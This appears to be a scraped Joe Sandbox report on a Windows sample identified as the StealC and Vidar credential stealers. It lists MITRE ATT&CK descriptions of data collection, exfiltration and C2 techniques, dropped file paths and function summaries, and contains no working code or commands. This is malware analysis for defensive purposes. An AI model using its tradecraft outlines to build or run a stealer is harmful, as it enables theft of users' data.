Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AEGHJEGIEBFIJJKFIIIJ

C:\ProgramData\BFHIJEBKEBGHIDHJKJEGCBAEGH

C:\ProgramData\CGDHIEGC

C:\ProgramData\DAKFIDHDGIEGCAKFIIJK

C:\ProgramData\DBFBFBGDBKJJKFIEHJDB

C:\ProgramData\HJDHCFCBGIDGHJJKJJDGHDGDHI

C:\ProgramData\IDBGHDGHCGHCAAKFIIECFHCFBF

C:\ProgramData\KEGDAKEH

C:\ProgramData\KEGDAKEHJDHIDHJJDAECFBKFHC

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

Windows Analysis Report
file.exe

Function 003B9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 003A45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 003ABE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6CC935A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 003B4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 003B9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 003A7710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 003B0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 003A5100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre